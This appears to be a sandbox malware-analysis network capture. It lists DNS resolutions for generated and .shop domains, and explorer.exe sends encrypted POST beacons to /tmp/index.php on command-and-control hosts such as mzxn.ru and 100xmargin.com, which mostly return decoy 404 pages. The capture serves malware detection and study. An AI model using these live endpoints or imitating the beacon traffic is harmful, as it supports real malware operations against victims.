Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		125.7.253.10	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		181.80.4.144	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		220.125.3.190	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		190.146.112.188	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		95.86.30.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		211.202.224.10	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		212.112.110.243	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:09.120906115 CEST	1.1.1.1	192.168.2.4	0x95eb	No error (0)	100xmargin.com		190.147.2.86	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:22.119040012 CEST	1.1.1.1	192.168.2.4	0x6ba2	No error (0)	mussangroup.com		185.149.100.242	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:31.125905037 CEST	1.1.1.1	192.168.2.4	0x3242	Name error (3)	oytrtojfgh.asia	none	none	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:43.057543039 CEST	1.1.1.1	192.168.2.4	0xb2da	No error (0)	mundoparachicas.space		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:28:43.057543039 CEST	1.1.1.1	192.168.2.4	0xb2da	No error (0)	mundoparachicas.space		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:12.158976078 CEST	1.1.1.1	192.168.2.4	0x6494	No error (0)	bassizcellskz.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:12.158976078 CEST	1.1.1.1	192.168.2.4	0x6494	No error (0)	bassizcellskz.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:13.756225109 CEST	1.1.1.1	192.168.2.4	0x2381	Name error (3)	celebratioopz.shop	none	none	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:13.776614904 CEST	1.1.1.1	192.168.2.4	0x626d	No error (0)	writerospzm.shop		172.67.166.231	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:13.776614904 CEST	1.1.1.1	192.168.2.4	0x626d	No error (0)	writerospzm.shop		104.21.16.74	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:14.731965065 CEST	1.1.1.1	192.168.2.4	0xa598	No error (0)	deallerospfosu.shop		172.67.204.20	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:14.731965065 CEST	1.1.1.1	192.168.2.4	0xa598	No error (0)	deallerospfosu.shop		104.21.69.39	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:17.033858061 CEST	1.1.1.1	192.168.2.4	0xcfc7	No error (0)	languagedscie.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:17.033858061 CEST	1.1.1.1	192.168.2.4	0xcfc7	No error (0)	languagedscie.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:18.051042080 CEST	1.1.1.1	192.168.2.4	0x7cdd	No error (0)	complaintsipzzx.shop		104.21.14.101	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:18.051042080 CEST	1.1.1.1	192.168.2.4	0x7cdd	No error (0)	complaintsipzzx.shop		172.67.158.159	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:19.237502098 CEST	1.1.1.1	192.168.2.4	0xa207	No error (0)	quialitsuzoxm.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:19.237502098 CEST	1.1.1.1	192.168.2.4	0xa207	No error (0)	quialitsuzoxm.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:20.500097990 CEST	1.1.1.1	192.168.2.4	0xef7c	No error (0)	steamcommunity.com		23.197.127.21	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:21.747329950 CEST	1.1.1.1	192.168.2.4	0xecf7	No error (0)	tenntysjuxmz.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:29:21.747329950 CEST	1.1.1.1	192.168.2.4	0xecf7	No error (0)	tenntysjuxmz.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		211.202.224.10	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		190.159.30.35	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		179.152.39.230	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		181.129.118.140	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		95.86.30.3	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		58.151.148.90	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		181.52.122.51	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		190.13.174.94	A (IP address)	IN (0x0001)	false
Aug 19, 2024 09:30:40.477627993 CEST	1.1.1.1	192.168.2.4	0xc968	No error (0)	100xmargin.com		213.172.74.157	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mussangroup.com

mundoparachicas.space

bassizcellskz.shop

writerospzm.shop

deallerospfosu.shop

languagedscie.shop

complaintsipzzx.shop

quialitsuzoxm.shop

steamcommunity.com

tenntysjuxmz.shop

jtjqwjwvmfygnuav.org

mzxn.ru

boxojcljwlovjo.org

100xmargin.com

ybcrnlpbrukjlme.com

kovxkdviapxl.net

dnnisollkivyeq.com

jbjrschlkljuccuw.org

gkfddrcydpdijc.org

csgncofvxcv.com

gmuqjionewdc.com

lxirtptkcykkr.org

dajceptfmjkh.net

riwgwvjrbnmwo.net

nlcihkcpqxmi.com

ykdamwdnhbwpknpg.org

snmklddnlivyu.net

dlmvqfjbkpla.org

tmkcjriymiwrj.org

prlieqcsxkp.net

osgexwvtdnb.org

rklgwxcehosl.com

crtlcijemvyx.org

eodueolaaev.com

naeduqoyqokl.org

wipabeoxyiindo.com

jehaldxqvvea.org

urtrdmlxhbyurook.org

lliabotheqxncloc.org

kjgfasvdoxofbfqb.com

djwjxjenyqhjtklo.org

xmrxamwxfvkybcwf.org

docehetfrtjrb.net

qnwpuvrofdmbcpnt.com

hhjnintgajpt.net

jxrfghxdpppsidad.com

qjklivdfirkmv.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	77.29.6.193	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:27:47.592767954 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jtjqwjwvmfygnuav.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 242 Host: mzxn.ru
Aug 19, 2024 09:27:47.592767954 CEST	242	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5e 3c cc 93 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vu^<]wnIz+3g={~&S#U_F6?MzW,&Nw<J$ZG/>D$XTw0FBC'jEW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:09.128556013 CEST	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://boxojcljwlovjo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 206 Host: 100xmargin.com
Aug 19, 2024 09:28:09.128586054 CEST	206	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 4c b5 9b Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA .[k,vuHLJc`i4Vi>`fgb9rYhdF$IlYG-)K],=R/yA`Y2KYLPi
Aug 19, 2024 09:28:10.187474012 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:10.220712900 CEST	287	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ybcrnlpbrukjlme.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 290 Host: 100xmargin.com
Aug 19, 2024 09:28:10.220712900 CEST	290	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 40 17 ff bb Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vu@XSsEebW_t.ue6~Gl#3Cud:0(fC2NG^#$)SBvkpdlpDuG&R)
Aug 19, 2024 09:28:11.288753986 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:11.297051907 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kovxkdviapxl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: 100xmargin.com
Aug 19, 2024 09:28:11.297087908 CEST	189	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 79 41 c1 aa Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vuyA-myoqE;B}\y7$s&UYDz-R)?\|-?.
Aug 19, 2024 09:28:12.363672972 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:12.372448921 CEST	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dnnisollkivyeq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: 100xmargin.com
Aug 19, 2024 09:28:12.372477055 CEST	214	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 2f 2c a2 8e Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vu/,t;^O$QI'b0td+jV%R$D(5+Qoo:GU&/SnFWh750t1&
Aug 19, 2024 09:28:13.440229893 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:13.448775053 CEST	288	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jbjrschlkljuccuw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: 100xmargin.com
Aug 19, 2024 09:28:13.448775053 CEST	164	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 46 3d e3 b9 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vuF=t:G@IzcW8pv,dHfw4::mZXq>GE
Aug 19, 2024 09:28:14.515625000 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:14.531104088 CEST	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gkfddrcydpdijc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 128 Host: 100xmargin.com
Aug 19, 2024 09:28:14.531126022 CEST	128	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 37 3a c5 f0 Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vu7:zkw,}FDtdjr\
Aug 19, 2024 09:28:15.588284016 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:15 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:15.596493006 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://csgncofvxcv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 196 Host: 100xmargin.com
Aug 19, 2024 09:28:15.596508980 CEST	196	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 49 58 c3 8a Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vuIXb1[YWtwHGtIiWh@^CT=V^GwB3`96-4D3H
Aug 19, 2024 09:28:16.666667938 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 19 Aug 2024 07:28:16 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	189.163.89.217	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 09:28:16.674839020 CEST	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gmuqjionewdc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: 100xmargin.com
Aug 19, 2024 09:28:16.674865961 CEST	343	OUT	Data Raw: 3b 6e 56 18 87 ca 1b 27 ac de c2 03 07 74 0c be 09 0a cb 96 6d 03 e5 62 7d 0c 78 e1 45 c3 c7 62 e9 2d c3 2f 06 1f 24 6c ec ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 33 03 a6 ba Data Ascii: ;nV'tmb}xEb-/$l? 9Yt M@NA -[k,vu3G!Esp\|VJ> 5q@JxT6Q<!2~CAH3 +KgBTt`7zC^0psKzLscX^
